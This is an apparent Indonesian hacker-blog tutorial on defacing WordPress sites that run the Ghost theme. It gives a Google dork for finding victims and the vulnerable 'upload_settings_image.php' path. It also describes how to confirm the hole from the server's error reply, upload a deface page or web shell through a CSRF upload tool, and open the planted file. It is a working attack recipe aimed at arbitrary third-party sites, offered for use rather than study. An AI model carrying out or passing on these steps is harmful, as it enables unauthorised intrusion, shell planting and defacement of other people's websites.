Tutorial Deface Metode Wp - Ghost Themes- Razzer Hacker

Oke sobat razzer kali ini kita akan pepes lagi ni ea :3. Di Poc kali ini sangat mudah untuk kita pelajari. Nama poc nya yaitu Wp - Ghost Themes. Nah pasti sobat tidak asing lagi dengan nama nya Wp? Nah wp ini ada Wordpress jadi saya singkat agar mudah di baca:v Oke gasken aja ea :3

Bahan Bahan Yang Kalian Perlukan :

Hp/Pc.
Internet.
Sc Deface/Shell.
Tools CSRF.

#Untuk Dork Nya :
inurl:wp-content/themes/Ghost/

#Exploit :
/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Step By Step :

1. Kalian dorking dulu di google.

2. Setelah kalian dorking pilih salah 1 web.

3. Lalu kalian tambahkan exploit nya di belakang url nya.

Contoh:

http://razzerhacker.blogspot.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Nah nanti ada bacaan {"status":"NOK", "ERR":"This file is incorect"}. Nah itu tanda nya VULN ya sobat.

Contoh gambar di bawah.

4. Nah kalo error itu tanda nya VULN teman teman lalu kalian pergi ke Tools CSRF nya (Klik Disini).

Nah klo sudah ke Tools CSRF Maka di bagian :

URL : Isi dengan target kalian yang tadi error.
POST FILE : Isi dengan (Filedata).

Lalu Klik Kunci Target.

Nah nanti kalian bakal di suruh up sc atau shell jika web nya support up shell maka up shell aja tapi klo kga support up shell up sc tercinta kalian aja:v

5. Nah nanti ada bacaan {"status":"OK","imageID":"NamaScKalian","imageName":"NamaScKalian","html":"\n\t\n\t\t
html File<\/div><\/td>\n\t\tNamaScKalian.html
\n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}

Nah itu tanda nya Success.

Contoh gambar di bawah.

6. Lalu gimana cara manggil sc nya mass? hooh mudah kok tinggal kalian tambahkan wp-content/uploads/settingsimages/nama Sc kalian.html di belakang site.

Contoh :
http://razzerhacker.blogspot.com/wp-content/uploads/settingsimages/nama Sc kalian.html

Dan lihat hasil nya kepepes jga:v